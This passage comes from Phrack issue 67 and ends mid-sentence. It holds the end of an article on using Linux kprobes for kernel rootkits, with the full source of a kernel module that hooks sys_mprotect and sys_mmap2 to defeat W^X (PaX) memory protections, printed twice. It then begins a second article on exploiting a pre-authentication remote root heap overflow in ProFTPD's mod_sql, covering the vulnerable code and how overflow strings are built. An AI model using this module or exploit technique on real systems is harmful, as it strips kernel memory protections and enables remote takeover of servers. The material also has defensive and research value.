non-trivial if the reader followed this paper in its entirety. I simply
did not have enough time to design this feature -- a kretprobe for hackers
that allows control of the return value. Lets call this feature 'rpe' 
(Return probe elite) the BASIC schematics would look like:

int register_rpe(struct kretprobe *rp)
{	
	   
	  ... <code> ...
	   rp->kp.pre_handler = pre_handler_rpe;
	   ... <code> ...
}

static int pre_handler_rpe(struct kprobe *p,
                                 struct pt_regs *regs)
{
	arch_prepare_rpe(regs);

}


void arch_prepare_rpe(struct pt_regs *regs)
{

	unsigned long *ret = stack_addr(regs);

        ret_addr = (kprobe_opcode_t *) *sara;

        /* Replace the return addr with trampoline addr */
        *ret = (unsigned long) &rpe_trampoline;
}

rpe_trampoline could be either an asm stub or an actual
function -- either way you would want to backup the registers
before calling your handler that does what you want --
to process data and ultimately return whatever value you want
For instance:
    __asm__ ("movl $val, %eax\n"
	     "push $ret_addr\n"
	     "ret");

Since I did not provide an implementation for a more flexible
kretprobe, the reader may be interested in doing so. Once I
get an opportunity I intend on writing an LKM patch for one
and releasing it.


---[ 3 - Patch to unpatch W^X (mprotect/mmap restrictions)

Lets move on to a couple of other patches using the existing
kprobe features to show some usefulness other than a file hiding
mechanism. These two patches will aim at disabling the W^X feature
that is enabled in kernels -- PaX for instance calls this mprotect
restrictions. W^X is to say that an mmap segment cannot be created
or modified to be both write+execute. The patches below give us
two benefits:

1. On systems with the NX (no_exec_pages) bit set, we will be able
to do things like mark the data segment as executable and inject
code there for execution using ptrace.

2. Many ELF protectors (Burneye, Shiva, Elfcrypt, etc.) store the
encrypted executable in the text segment of the stub/loading code
and to decrypt part of a programs own text, would be considered self
modifying code -- W^X prevents this -- so with our Anti-W^X patch
we can use our ELF Protectors, and make segments such as the stack
and data segment, once again, executable on systems with the NX bit set
where mprotect/mmap restrictions really make a difference.

An important note is that due to the design nature of the following
patch, we cannot change the return values; so mprotect and mmap
will both give a return value that says they failed-- don't exit
based on error checking because your write+execute mmap and mprotect
attempts actually succeed. To test you can look at /proc/pid/maps
of the given process.			

-- tested on 2.6.18 -- 

On modern systems simply change regs->eax to regs->ax in the two necessary spots.
Also exporting the module license to GPL is not necessary to use kprobes on modern
systems.

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/kprobes.h>
#include <linux/mm.h>
#include <linux/fs.h>
#include <linux/file.h>


#define PROT_READ       0x1             /* Page can be read.  */
#define PROT_WRITE      0x2             /* Page can be written.  */
#define PROT_EXEC       0x4             /* Page can be executed.  */
#define PROT_NONE       0x0             /* Page can not be accessed.  */
#define MAP_FIXED       0x10   		

#define MAP_ANONYMOUS   0x20            /* don't use a file */
#define MAP_GROWSDOWN   0x0100          /* stack-like segment */
#define MAP_DENYWRITE   0x0800          /* ETXTBSY */
#define MAP_EXECUTABLE  0x1000          /* mark it as an executable */

/* 
 * It is preferable to write a script that gets
 * kallsyms_lookup_name() from System.map and then
 * passes it as a module parameter, but in this example
 * we just look it up and assign it our selves, so
 * make sure to change the address.
 */
unsigned long (*_kallsyms_lookup_name)(char *) = (void *)0xc043e5d0; // change this

unsigned long (*_get_unmapped_area)(struct file *file, unsigned long addr, unsigned long len,
                unsigned long pgoff, unsigned long flags);

	
static struct 
{
	int assign_wx;
	unsigned long start;
	size_t len;
	long prot;
} mprotect;

MODULE_LICENSE("GPL");

asmlinkage int kp_sys_mprotect(unsigned long start, size_t len, long prot)
{
        struct vm_area_struct *vma = current->mm->mmap;
		
	mprotect.assign_wx = 0;
	mprotect.start = start;
	mprotect.prot = prot;

	/* This doesn't concern us */
        if (!(prot & PROT_EXEC) && !(prot & PROT_WRITE))
                goto out;

        down_write(&current->mm->mmap_sem);
        
	/* Get vma for start memory area */
        vma = find_vma(current->mm, start);
	if (!vma)
		goto free_sem;

        if (prot & (PROT_WRITE|PROT_EXEC))
	{
		mprotect.assign_wx++;
		goto free_sem;
	}

	if (prot & PROT_WRITE)
        {
	        mprotect.assign_wx++;
        	goto free_sem;
	}
	
        if (prot & PROT_EXEC)
	{
		mprotect.assign_wx++;
		goto free_sem;
	}
	
	free_sem:
	up_write(&current->mm->mmap_sem);
	
	out:
	jprobe_return();
	return 0;
}

/*
 before the following function is executed, a W^X patch such as PaX
 mprotect/mmap restrictions, will have code such as:
 if ((vm_flags & (VM_WRITE | VM_EXEC)) != VM_EXEC)
                       vm_flags &= ~(VM_EXEC | VM_MAYEXEC);
               else
                       vm_flags &= ~(VM_WRITE | VM_MAYWRITE);
 
 But our return probe gets the last say in the matter. mprotect
 will return like it failed (With a positive value) but the VMA's
 or memory maps will be both write+execute, just make sure that
 you don't error checking then exit if mprotect or mmap fail 
 because they will return failed values.
*/

static int rp_mprotect(struct kretprobe_instance *ri, struct pt_regs *regs)
{
	struct vm_area_struct *vma;

	if (!mprotect.assign_wx)
		goto out;
	
	down_write(&current->mm->mmap_sem);

        /* Get vma for start memory area */
        vma = find_vma(current->mm, mprotect.start);
        if (!vma)
                goto sem_out;

	if (mprotect.prot & PROT_EXEC)
	{
		vma->vm_flags |= VM_MAYEXEC;
		vma->vm_flags |= VM_EXEC;
	}
	
	if (mprotect.prot & PROT_WRITE)
	{
		vma->vm_flags |= VM_MAYWRITE;
		vma->vm_flags |= VM_WRITE;
	}
	
	sem_out:
	up_write(&current->mm->mmap_sem);
		

	out:
	return 0;
}

struct 
{
        unsigned long addr;
#define MMAP_CLEAN 0
#define MMAP_DIRTY 1
        int mmap_prot_state;
        unsigned int len;
} do_mmap_data;

/* Return probe code for sys_mmap2 */
static int rp_mmap(struct kretprobe_instance *ri, struct pt_regs *regs)
{
        struct vm_area_struct *vma = current->mm->mmap;
        
        /* we are assuming the default function to get an unmapped region is arch_get_unmapped_topdown() */
        if (do_mmap_data.addr - regs->eax == do_mmap_data.len)
                do_mmap_data.addr = regs->eax;
        else
		goto out; // pretty unlikely

        switch(do_mmap_data.mmap_prot_state)
        {
                case MMAP_CLEAN:
                        break;
                case MMAP_DIRTY: // lets undo the work of the W^X patch :)
                        down_write(&current->mm->mmap_sem);
                        vma = find_vma(current->mm, do_mmap_data.addr);
                        if (!vma)
                                break;
			printk("Found vma's and setting all writes and exec possibilities\n");
                        vma->vm_flags |= (VM_EXEC | VM_MAYEXEC);
                        vma->vm_flags |= (VM_WRITE | VM_MAYWRITE);
                        up_write(&current->mm->mmap_sem);
                        break;
        }
	out:
	return 0;
}

asmlinkage long kp_sys_mmap2(unsigned long addr, unsigned long len, unsigned long prot, unsigned long flags,
                          unsigned long fd, unsigned long pgoff)
{

        struct file *file = NULL;
	
	printk("In sys_mmap2\n");
        do_mmap_data.len = len;

        /* We emulate a combination of sys_mmap2 and do_mmap_pgoff */
        
	/* This is the easiest scenario */
	/* because we know the mmap addr */
        if (flags & MAP_FIXED)
        {
		printk("MAP_FIXED\n");
                do_mmap_data.addr = addr;
                if ((prot & PROT_EXEC) && (prot & PROT_WRITE))
                        do_mmap_data.mmap_prot_state = MMAP_DIRTY;
                else
                        do_mmap_data.mmap_prot_state = MMAP_CLEAN;
                goto out;
        }

        flags &= ~(MAP_EXECUTABLE | MAP_DENYWRITE);
        if (!(flags & MAP_ANONYMOUS)) 
        {
                file = fget(fd);
                if (!file)
                        goto out;
        }
        
        /* mimick do_mmap_pgoff to get the linear range */
        down_write(&current->mm->mmap_sem);

        if (file) 
        {
                if (!file->f_op || !file->f_op->mmap)
                        goto sem_out;
        }

        if (!len)
                goto sem_out;

        len = PAGE_ALIGN(len);
        if (!len || len > TASK_SIZE)
                goto sem_out;

        if ((pgoff + (len >> PAGE_SHIFT)) < pgoff)
                goto sem_out;

        /* when the real sys_mmap2/do_mmap_pgoff are called 
         * they will get the next linear range 
	 * which will be at do_mmap_data.addr - do_mmap_data.len 
         * This relies on get_unmapped_area() calling arch_get_unmapped_area_topdown() 
	 */
	printk("get_unmapped_area call\n");
        addr = _get_unmapped_area(file, addr, len, 0, flags);
        printk("addr: 0x%lx\n", addr);
	do_mmap_data.addr = addr;

        if ((prot & PROT_EXEC) && (prot & PROT_WRITE))
                do_mmap_data.mmap_prot_state = MMAP_DIRTY;
	else
               	do_mmap_data.mmap_prot_state = MMAP_CLEAN;
                
        sem_out:
        up_write(&current->mm->mmap_sem);
        out:
        jprobe_return();
        return 0;

}

static struct jprobe sys_mmap2_jprobe = 
{
        .entry = (kprobe_opcode_t *)kp_sys_mmap2
};

static struct jprobe sys_mprotect_jprobe =
{
	.entry = (kprobe_opcode_t *)kp_sys_mprotect
};

static struct kretprobe mprotect_kretprobe = 
{
        .handler  = rp_mprotect,
	.maxactive = 1 // this code isn't really SMP reliable
};

static struct kretprobe mmap_kretprobe =
{
        .handler = rp_mmap,
        .maxactive = 1 // this code isn't really SMP reliable
};


void exit_module(void)
{
	unregister_jprobe(&sys_mmap2_jprobe);
        unregister_jprobe(&sys_mprotect_jprobe);

        unregister_kretprobe(&mprotect_kretprobe);
        unregister_kretprobe(&mmap_kretprobe);
}

int init_module(void)
{
	int j = 0, k = 0;

	_get_unmapped_area = (void *)_kallsyms_lookup_name("arch_get_unmapped_area_topdown");
	
	sys_mmap2_jprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mmap2");
	/* Register our jprobes */
	if (register_jprobe(&sys_mmap2_jprobe) < 0)
		goto jfail;
	j++;

	sys_mprotect_jprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mprotect");
	if (register_jprobe(&sys_mprotect_jprobe) < 0)
		goto jfail;
	
	mprotect_kretprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mprotect");
	/* Register our kretprobes */
	if (register_kretprobe(&mprotect_kretprobe) < 0)
		goto kfail;
	k++;
	
	mmap_kretprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mmap2");
	if (register_kretprobe(&mmap_kretprobe) < 0)
		goto kfail;
	
	return 0;

	jfail:
		
		printk(KERN_EMERG "register_jprobe failed for %s\n", (!j ? "sys_mmap2" : "sys_mprotect"));
	kfail:
		printk(KERN_EMERG "register_kretprobe failed for %s\n", (!k ? "mprotect" : "mmap"));

	return -1;
}

	
module_exit(exit_module);

--- end of code ---


---[ 4 - Notes on rootkit detection for kprobes

If a kernel rootkit is designed soley using kprobes and properly hides
itself from the kprobe entries in sysfs, then a rootkit detection program
can still easily detect what kernel functions have been hooked. I will
leave this obvious solution to anyone interested in adding this feature
to their detectors but the answer lies in this paper as well as the kprobe
documentation.


---[ 5 - Summing it all up

We have seen that the kprobe interface, which is primarily implemented
for kernel debugging can be used to instrument the kernel in some
interesting ways. We have explored kprobes strengths, weaknesses, and provided
several examples of weakening the kernel by patching it using jprobe and
kretprobe techniques. We also went over some ideas for implementing a more
hacker friendly kretprobe implementation (Although we did not provide one).

It is also important to mention to people who are engineering security code
that kprobes can also be used to debug kernel code, as well as install simple
patches for hardening the kernel. But phrack isn't about that, so patches
to harden the kernel were not included -- just know that it is possible.


---[ 6 - Greetz

kad - thanks for encouraging me to write this, and being cool guy with
priceless skills and good advice.

Silvio - My initial inspiration for kernel and ELF hacking all started with you.
You've been a good friend and mentor, many many thanks.

chrak - My long time friend and occasional coding partner. 13yrs ago this guy
helped me write my first backdoor program for Linux.

nynex - I owe you for hosting my stuff and being a good friend.

mayhem - For writing some really cool ELF code and being an inspiration.

grugq - Your original AF work has been an inspiration as well.

halfdead - For knowing everything about the universe and our realm *literally*

jimjones (UNIX Terrorist) - you will be getting a copy of this soon, word.

All of the digitalnerds -- especially halfdead, scrippie, pronsa and abh.

#bitlackeys on EFnet, a small and strange little channel with people whom
I've been friends with for years.

#formal on a secret network with extremely smart people and good conversation.

RuxCon folk are pretty much all awesome too, thanks.


---[ 7 - References

Please note that I did not use any references other than code and official
documentation for this paper, but the following papers are quite relevant and
since I have read them (along with many other great papers) they all play a
role in my collective knowledge of kernel malware and rootkit exploration.

[1] kad - Handling interrupt descriptor table for fun and profit
          http://www.phrack.org/issues.html?issue=59&id=4#article

[2] Halfdead - Mystifying the debugger for ultimate stealthness 
               http://www.phrack.org/issues.html?issue=65&id=8#article 

[3] Silvio - Kernel function hijacking (Function trampolines)
             http://vxheavens.com/lib/vsc08.html 


---[ 8 - Code

/*
	Tested on 2.6.18 kernel, on modern kernels change regs->eax to regs->ax.	
	From the ElfMaster, 2010.

Makefile:

obj-m += w_plus_x.o

MODULES = w_plus_x.ko

all: clean $(MODULES)

$(MODULES):
        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
        rm -f *.o *.ko Module.markers Module.symvers w_plus_x*.mod.c modules.order


*/


#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/kprobes.h>
#include <linux/mm.h>
#include <linux/fs.h>
#include <linux/file.h>


#define PROT_READ       0x1             /* Page can be read.  */
#define PROT_WRITE      0x2             /* Page can be written.  */
#define PROT_EXEC       0x4             /* Page can be executed.  */
#define PROT_NONE       0x0             /* Page can not be accessed.  */
#define MAP_FIXED       0x10   		

#define MAP_ANONYMOUS   0x20            /* don't use a file */
#define MAP_GROWSDOWN   0x0100          /* stack-like segment */
#define MAP_DENYWRITE   0x0800          /* ETXTBSY */
#define MAP_EXECUTABLE  0x1000          /* mark it as an executable */

/* 
 * It is preferable to write a script that gets
 * kallsyms_lookup_name() from System.map and then
 * passes it as a module parameter, but in this example
 * we just look it up and assign it our selves, so
 * make sure to change the address.
 */
unsigned long (*_kallsyms_lookup_name)(char *) = (void *)0xc043e5d0; // change this

unsigned long (*_get_unmapped_area)(struct file *file, unsigned long addr, unsigned long len,
                unsigned long pgoff, unsigned long flags);

	
static struct 
{
	int assign_wx;
	unsigned long start;
	size_t len;
	long prot;
} mprotect;

MODULE_LICENSE("GPL");

asmlinkage int kp_sys_mprotect(unsigned long start, size_t len, long prot)
{
        struct vm_area_struct *vma = current->mm->mmap;
		
	mprotect.assign_wx = 0;
	mprotect.start = start;
	mprotect.prot = prot;

	/* This doesn't concern us */
        if (!(prot & PROT_EXEC) && !(prot & PROT_WRITE))
                goto out;

        down_write(&current->mm->mmap_sem);
        
	/* Get vma for start memory area */
        vma = find_vma(current->mm, start);
	if (!vma)
		goto free_sem;

        if (prot & (PROT_WRITE|PROT_EXEC))
	{
		mprotect.assign_wx++;
		goto free_sem;
	}

	if (prot & PROT_WRITE)
        {
	        mprotect.assign_wx++;
        	goto free_sem;
	}
	
        if (prot & PROT_EXEC)
	{
		mprotect.assign_wx++;
		goto free_sem;
	}
	
	free_sem:
	up_write(&current->mm->mmap_sem);
	
	out:
	jprobe_return();
	return 0;
}

/*
 before the following function is executed, a W^X patch such as PaX
 mprotect/mmap restrictions, will have code such as:
 if ((vm_flags & (VM_WRITE | VM_EXEC)) != VM_EXEC)
                       vm_flags &= ~(VM_EXEC | VM_MAYEXEC);
               else
                       vm_flags &= ~(VM_WRITE | VM_MAYWRITE);
 
 But our return probe gets the last say in the matter. mprotect
 will return like it failed (With a positive value) but the VMA's
 or memory maps will be both write+execute, just make sure that
 you don't error checking then exit if mprotect or mmap fail 
 because they will return failed values.
*/

static int rp_mprotect(struct kretprobe_instance *ri, struct pt_regs *regs)
{
	struct vm_area_struct *vma;

	if (!mprotect.assign_wx)
		goto out;
	
	down_write(&current->mm->mmap_sem);

        /* Get vma for start memory area */
        vma = find_vma(current->mm, mprotect.start);
        if (!vma)
                goto sem_out;

	if (mprotect.prot & PROT_EXEC)
	{
		vma->vm_flags |= VM_MAYEXEC;
		vma->vm_flags |= VM_EXEC;
	}
	
	if (mprotect.prot & PROT_WRITE)
	{
		vma->vm_flags |= VM_MAYWRITE;
		vma->vm_flags |= VM_WRITE;
	}
	
	sem_out:
	up_write(&current->mm->mmap_sem);
		

	out:
	return 0;
}

struct 
{
        unsigned long addr;
#define MMAP_CLEAN 0
#define MMAP_DIRTY 1
        int mmap_prot_state;
        unsigned int len;
} do_mmap_data;

/* Return probe code for sys_mmap2 */
static int rp_mmap(struct kretprobe_instance *ri, struct pt_regs *regs)
{
        struct vm_area_struct *vma = current->mm->mmap;
        
        /* we are assuming the default function to get an unmapped region is arch_get_unmapped_topdown() */
        if (do_mmap_data.addr - regs->eax == do_mmap_data.len)
                do_mmap_data.addr = regs->eax;
        else
		goto out; // pretty unlikely

        switch(do_mmap_data.mmap_prot_state)
        {
                case MMAP_CLEAN:
                        break;
                case MMAP_DIRTY: // lets undo the work of the W^X patch :)
                        down_write(&current->mm->mmap_sem);
                        vma = find_vma(current->mm, do_mmap_data.addr);
                        if (!vma)
                                break;
			printk("Found vma's and setting all writes and exec possibilities\n");
                        vma->vm_flags |= (VM_EXEC | VM_MAYEXEC);
                        vma->vm_flags |= (VM_WRITE | VM_MAYWRITE);
                        up_write(&current->mm->mmap_sem);
                        break;
        }
	out:
	return 0;
}

asmlinkage long kp_sys_mmap2(unsigned long addr, unsigned long len, unsigned long prot, unsigned long flags,
                          unsigned long fd, unsigned long pgoff)
{

        struct file *file = NULL;
	
	printk("In sys_mmap2\n");
        do_mmap_data.len = len;

        /* We emulate a combination of sys_mmap2 and do_mmap_pgoff */
        
	/* This is the easiest scenario */
	/* because we know the mmap addr */
        if (flags & MAP_FIXED)
        {
		printk("MAP_FIXED\n");
                do_mmap_data.addr = addr;
                if ((prot & PROT_EXEC) && (prot & PROT_WRITE))
                        do_mmap_data.mmap_prot_state = MMAP_DIRTY;
                else
                        do_mmap_data.mmap_prot_state = MMAP_CLEAN;
                goto out;
        }

        flags &= ~(MAP_EXECUTABLE | MAP_DENYWRITE);
        if (!(flags & MAP_ANONYMOUS)) 
        {
                file = fget(fd);
                if (!file)
                        goto out;
        }
        
        /* mimick do_mmap_pgoff to get the linear range */
        down_write(&current->mm->mmap_sem);

        if (file) 
        {
                if (!file->f_op || !file->f_op->mmap)
                        goto sem_out;
        }

        if (!len)
                goto sem_out;

        len = PAGE_ALIGN(len);
        if (!len || len > TASK_SIZE)
                goto sem_out;

        if ((pgoff + (len >> PAGE_SHIFT)) < pgoff)
                goto sem_out;

        /* when the real sys_mmap2/do_mmap_pgoff are called 
         * they will get the next linear range 
	 * which will be at do_mmap_data.addr - do_mmap_data.len 
         * This relies on get_unmapped_area() calling arch_get_unmapped_area_topdown() 
	 */
	printk("get_unmapped_area call\n");
        addr = _get_unmapped_area(file, addr, len, 0, flags);
        printk("addr: 0x%lx\n", addr);
	do_mmap_data.addr = addr;

        if ((prot & PROT_EXEC) && (prot & PROT_WRITE))
                do_mmap_data.mmap_prot_state = MMAP_DIRTY;
	else
               	do_mmap_data.mmap_prot_state = MMAP_CLEAN;
                
        sem_out:
        up_write(&current->mm->mmap_sem);
        out:
        jprobe_return();
        return 0;

}

static struct jprobe sys_mmap2_jprobe = 
{
        .entry = (kprobe_opcode_t *)kp_sys_mmap2
};

static struct jprobe sys_mprotect_jprobe =
{
	.entry = (kprobe_opcode_t *)kp_sys_mprotect
};

static struct kretprobe mprotect_kretprobe = 
{
        .handler  = rp_mprotect,
	.maxactive = 1 // this code isn't really SMP reliable
};

static struct kretprobe mmap_kretprobe =
{
        .handler = rp_mmap,
        .maxactive = 1 // this code isn't really SMP reliable
};


void exit_module(void)
{
	unregister_jprobe(&sys_mmap2_jprobe);
        unregister_jprobe(&sys_mprotect_jprobe);

        unregister_kretprobe(&mprotect_kretprobe);
        unregister_kretprobe(&mmap_kretprobe);
}

int init_module(void)
{
	int j = 0, k = 0;

	_get_unmapped_area = (void *)_kallsyms_lookup_name("arch_get_unmapped_area_topdown");
	
	sys_mmap2_jprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mmap2");
	/* Register our jprobes */
	if (register_jprobe(&sys_mmap2_jprobe) < 0)
		goto jfail;
	j++;

	sys_mprotect_jprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mprotect");
	if (register_jprobe(&sys_mprotect_jprobe) < 0)
		goto jfail;
	
	mprotect_kretprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mprotect");
	/* Register our kretprobes */
	if (register_kretprobe(&mprotect_kretprobe) < 0)
		goto kfail;
	k++;
	
	mmap_kretprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mmap2");
	if (register_kretprobe(&mmap_kretprobe) < 0)
		goto kfail;
	
	return 0;

	jfail:
		
		printk(KERN_EMERG "register_jprobe failed for %s\n", (!j ? "sys_mmap2" : "sys_mprotect"));
	kfail:
		printk(KERN_EMERG "register_kretprobe failed for %s\n", (!k ? "mprotect" : "mmap"));

	return -1;
}

	
module_exit(exit_module);

----EOF----


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x43, Phile #0x07 of 0x10

|=-----------------------------------------------------------------------=|
|=------=[ ProFTPD with mod_sql pre-authentication, remote root  ]=------=|
|=-------------------------=[ heap overflow ]=---------------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------=[ max_packetz@felinemenace.org ]=------------------=|
|=-----------------------------------------------------------------------=|

--[ Contents

  1 - Introduction 

  2 - The vulnerability
   2.1 - Tags explained
   2.2 - Generating overflow strings

  3 - Exploring what we can control
   3.1 - Automating tasks
   3.2 - ProFTPD Pool allocator
   3.3 - Examining backtraces
    3.3.1 - 11380f2c8ce44d29b93b9bc6308692ae backtrace
    3.3.2 - 2813d637d735be610a460a75db061f6b backtrace
    3.3.3 - 3d10e2a054d8124ab4de5b588c592830 backtrace
    3.3.4 - 844319188798d7742af43d10f6541a61 backtrace 
    3.3.5 - 914b175392625fe75c2b16dc18bfb250 backtrace
    3.3.6 - b975726b4537662f3f5ddf377ea26c20 backtrace
    3.3.7 - ccbbd918ad0dbc7a869184dc2eb9cc50 backtrace
    3.3.8 - f1bfd5428c97b9d68a4beb6fb8286b70 backtrace
    3.3.9 - Summary
   3.4 - Exploitation avenues
    3.4.1 - Shellcode approach
    3.4.2 - Data manipulation

  4 - Writing an exploit
   4.1 - Exploitation via arbitrary pointer return
   4.2 - Cleanup structure crash
   4.3 - Potential enhancements
   4.4 - Last thoughts

  5 - Discussion of hardening techniques against exploitation
   5.1 - Address Space Layout Randomisation
   5.2 - Non-executable Memory
   5.3 - Position Independent Binaries
   5.4 - Stack Protector
   5.5 - RelRO

  6 - References

--[ 1 - Introduction 

This paper describes and explores a pre-authentication remote root heap
overflow in the ProFTPD [1] FTP server. It's not quite a standard overflow,
due to the how the ProFTPD heap works, and how the bug is exploited via 
variable substition.

The vulnerability was inadvertently mitigated (from remote root, at least 
:( ) when the ProFTPD developers fixed a separate vulnerability in mod_sql 
where you could inject SQL and bypass authentication. That vulnerability 
that mitigated it is documented in CVE-2009-0542. 

The specific vulnerability we are exploring is an unbounded copy operation 
in sql_prepare_where(), which has not been fixed yet.

Also, I'd like to preemptively apologise for the attached code. It evolved 
over time in piecemeal fashion, and isn't overly pretty/readable by now :p

--[ 2 - The vulnerability

The vulnerability itself is a little contrived, but bare with me:

In contrib/mod_sql.c, _sql_getpasswd(), we have the following code (line 
numbers from ProFTPD 1.3.2rc2):

---
1132   if (!cmap.usercustom) {
1133     where = sql_prepare_where(0, cmd, 2, usrwhere, cmap.userwhere, 
                                   NULL);
1134
1135     mr = _sql_dispatch(_sql_make_cmd(cmd->tmp_pool, 5, "default",
1136       cmap.usrtable, cmap.usrfields, where, "1"), "sql_select");
1137
---

Where usrwhere is in the form of:

(<table name for user column> = 'USERNAME')

Inside of sql_prepare_where() is where all the fun takes place:

---
770 static char *sql_prepare_where(int flags, cmd_rec *cmd, int cnt, ...) {
771   int i, flag, nclauses = 0;
772   int curr_avail;
773   char *buf = "", *res;
774   va_list dummy;
775
776   res = pcalloc(cmd->tmp_pool, SQL_MAX_STMT_LEN);                   [1]
777
778   flag = 0;
779   va_start(dummy, cnt);
780   for (i = 0; i < cnt; i++) {
781     char *clause = va_arg(dummy, char *);
782     if (clause != NULL &&
783         *clause != '\0') {
784       nclauses++;
785
786       if (flag++)
787         buf = pstrcat(cmd->tmp_pool, buf, " AND ", NULL);
788       buf = pstrcat(cmd->tmp_pool, buf, "(", clause, ")", NULL);
789     }
790   }
791   va_end(dummy);
792
793   if (nclauses == 0)
794     return NULL;
795
796   if (!(flags & SQL_PREPARE_WHERE_FL_NO_TAGS)) {                    [2]
797     char *curr, *tmp;
798
799     /* Process variables in WHERE clauses, except any "%{num}" 
    references. */
800     curr = res;
801     curr_avail = SQL_MAX_STMT_LEN;
802
803     for (tmp = buf; *tmp; ) {
804       char *str;
805       modret_t *mr;
806
807       if (*tmp == '%') {
808         char *tag = NULL;
809
810         if (*(++tmp) == '{') {
811           char *query;
812
813           if (*tmp != '\0')
814             query = ++tmp;
815
816           while (*tmp && *tmp != '}')
817             tmp++;
818
819           tag = pstrndup(cmd->tmp_pool, query, (tmp - query));        
820           if (tag) {
821             str = resolve_long_tag(cmd, tag);                       [3]
822             if (!str)
823               str = pstrdup(cmd->tmp_pool, "");
824
825             mr = _sql_dispatch(_sql_make_cmd(cmd->tmp_pool, 2, 
           "default",
826               str), "sql_escapestring");
827             if (check_response(mr) < 0)
828               return NULL;
829
830             sstrcat(curr, mr->data, curr_avail);
831             curr += strlen(mr->data);
832             curr_avail -= strlen(mr->data);
833
834             if (*tmp != '\0')
835               tmp++;
836
837           } else {
838             return NULL;
839           }
840
841         } else {
842           str = resolve_short_tag(cmd, *tmp);                       [4]
843           mr = _sql_dispatch(_sql_make_cmd(cmd->tmp_pool, 2,"default",
844             str), "sql_escapestring");
845           if (check_response(mr) < 0)
846             return NULL;
847
848           sstrcat(curr, mr->data, curr_avail);
849           curr += strlen(mr->data);
850           curr_avail -= strlen(mr->data);
851
852           if (*tmp != '\0')
853             tmp++;
854         }
855
856       } else {                                                      [5]
857         *curr++ = *tmp++;
858         curr_avail--;
859       }
860     }
861     *curr++ = '\0';
862
863   } else {
864     res = buf;
865   }
866
867   return res;
868 }
869
---

At [1], memory is allocated. SQL_MAX_STMT_LEN is defined as 4096 bytes. 
That should be plenty for <300 bytes, right?

At [2], flags are checked to see if "tags" should be expanded. In the case 
we are interested in, tags are expanded.

At [3], we see that "long tags" are expandable, and that they are 
surrounded by %{ and finished with }. We'll ignore them for now. They take 
up too much input space in regards to the output length.

At [4], we see that they have concepts of "short" tags, consisting of one 
byte.

At [5], we see that they have an unbounded one byte copy operation, inside 
of a suitable loop.

Now, we need to cover tags to see what we can do with it:

------[ 2.1 Tags explained

For the path we're interested in, we'll cover "short" tags (longer tags are
not all interesting, and for reasons explained later on).

Looking at resolve_short_tag(), we see the following (heavily snipped for 
brevity):

---
1719 static char *resolve_short_tag(cmd_rec *cmd, char tag) {
1720   char arg[256] = {'\0'}, *argp;
1721
1722   switch (tag) {
1723   case 'A': {
1724       char *pass;
1725
1726       argp = arg;
1727       pass = get_param_ptr(main_server->conf, C_PASS, FALSE);
1728       if (!pass)
1729         pass = "UNKNOWN";
1730
1731       sstrncpy(argp, pass, sizeof(arg));
1732     }
1733     break;
1734
1735   case 'a':
1736     argp = arg;
1737     sstrncpy(argp, 
           pr_netaddr_get_ipstr(pr_netaddr_get_sess_remote_addr()),
1738       sizeof(arg));
1739     break;
1740
...
1914   case 'm':
1915     argp = arg;
1916     sstrncpy(argp, cmd->argv[0], sizeof(arg));
1917     break;
1918
...
1929   case 'r':
1930     argp = arg;
1931     if (strcmp(cmd->argv[0], C_PASS) == 0 &&
1932         session.hide_password)
1933       sstrncpy(argp, C_PASS " (hidden)", sizeof(arg));
1934
1935     else
1936       sstrncpy(argp, get_full_cmd(cmd), sizeof(arg));
1937     break;
1938
...
1954   case 'T':
1955     argp = arg;
1956     if (session.xfer.p) {
...
1974     } else
1975       sstrncpy(argp, "0.0", sizeof(arg));
1976
1977     break;
...
2021
2022   default:
2023     argp = "{UNKNOWN TAG}";
2024     break;
2025   }
2026
2027   return pstrdup(cmd->tmp_pool, argp);
2028 }
2029
---

So, as you can see, tags are a form of variable substitution. %m and %r 
allow us to "duplicate" our input, %a allows us to copy our IP address, %T 
gives us 0.0 (since we're not transferring anything at the moment, and %Z 
(handled by the default case) gives us "{UNKNOWN TAG}".

By combining these, we can generate strings that expand past the allocated 
size in sql_prepare_where, due to the unbounded copy.

Firstly, we'll look at what those inputs would generate, then we'll look at
how to generate suitable overflow strings.

Firstly, the string "AAA%m" once processed would come out looking like:

AAAAAA%m

The string "AAA%m%m" would look like:

AAAAAA%mAAA%m

Unfortunately the string to be expanded isn't as clean as that, it's:

(<name of user entry in table> = 'USER INPUT')\x00

The default of the table field is "userid". Due to the ')\x00 at the end, 
we can't do arbitrary off-by-1 or 2 overwrites. It's possible that \x00 or
\x29 could be useful, in some situations however.

Enough chars / %m's etc would expand past 4096 bytes, and start overwriting
other information stored on the heap. Tags enable exploitation of this 
issue via it's input duplication. They also have a significant effect on 
the heap, for better or worse.

(As a side note, contrib/mod_rewrite.c has %m tag support as well. Since it
seems a little unlikely to hit that pre-auth, it wasn't investigated 
further..)

------[ 2.2 Generating overflow strings

One initial complication we had in exploring this vulnerability further was
due to making an overflow string that once processed would expand to a 
suitable size. (As an example, overflow our own arbitrary content 32 bytes 
past 4096).

We solved this problem with using a constraint solver to generate the 
appropriate strings for us, thus solving an otherwise annoying situation 
(it being a little messy to calculate how much we need, since touching one 
thing can dramatically throw off the rest of the calculations, as an 
example, removing one A character would reduce it by one + 
(one * amount_of_%m_tags)).

In exploring the vulnerability, we used python-constraint [2].

We used several constraints:

  - Input string must be less than 256 bytes.
  - The parsed string must overflow by exactly X+2 (due to ') added to
    the end bytes.
  - One/two others that I've forgotten about as I write this up.

We split the strings into "fakeauth" strings, and "trigger" strings. The
fakeauth strings are designed to consume/allocate a certain amount of 
memory, and the trigger strings are designed to overwrite a bunch of bytes 
after the allocation.

Fakeauth strings seem to be required for maximum control of the remote 
process, but it's possible it's not required at all.

By mixing the %m's / %a's / %Z's up, it is possible to change memory 
allocation / deallocation order, and thus explore/affect where it crashes.

While the %a tags are useful in experimenting, they are not ideal, as you 
